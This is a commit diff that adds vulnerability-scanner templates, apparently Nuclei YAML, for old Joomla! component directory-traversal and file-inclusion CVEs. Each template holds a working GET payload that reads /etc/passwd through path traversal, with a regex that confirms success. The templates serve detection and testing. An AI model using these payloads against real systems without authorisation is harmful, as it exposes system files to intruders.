Update 8.4.9
parent
c6dbad9e02
commit
2937fc272b
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2008-4668
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/6618
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||||
|
tags: cve,cve2008,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/5435
|
- https://www.exploit-db.com/exploits/5435
|
||||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||||
tags: cve,cve2008,joomla,lfi
|
tags: cve,cve2008,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2008-6172
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/6817
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||||
|
tags: cve,cve2008,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/36994
|
- https://www.exploit-db.com/exploits/36994
|
||||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||||
tags: cve,cve2009,lfi
|
tags: cve,cve2009,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-0943
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11090
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/11088
|
- https://www.exploit-db.com/exploits/11088
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-0985
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/10948
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: CVE-2010-1219
|
||||||
|
info:
|
||||||
|
name: Joomla! Component com_janews - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11757
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1304
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component User Status - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11998
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1305
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12065
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1306
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12058
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1314
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12086
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1345
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/15453
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1345
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1353
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component LoginBox - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12068
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1353
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1354
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12102
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1354
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1471
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12170
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1471
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1474
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12182
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1474
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1475
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12147
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1475
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1494
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12113
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1494
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1495
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Matamko 1.01 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12286
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1495
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1532
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12118
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1532
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1533
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12142
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1533
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1535
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12151
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1535
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1601
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component JA Comment - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12236
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1601
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1602
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12283
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1602
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1657
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12428
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1657
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1659
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12426
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1659
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1714
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12168
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1714
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
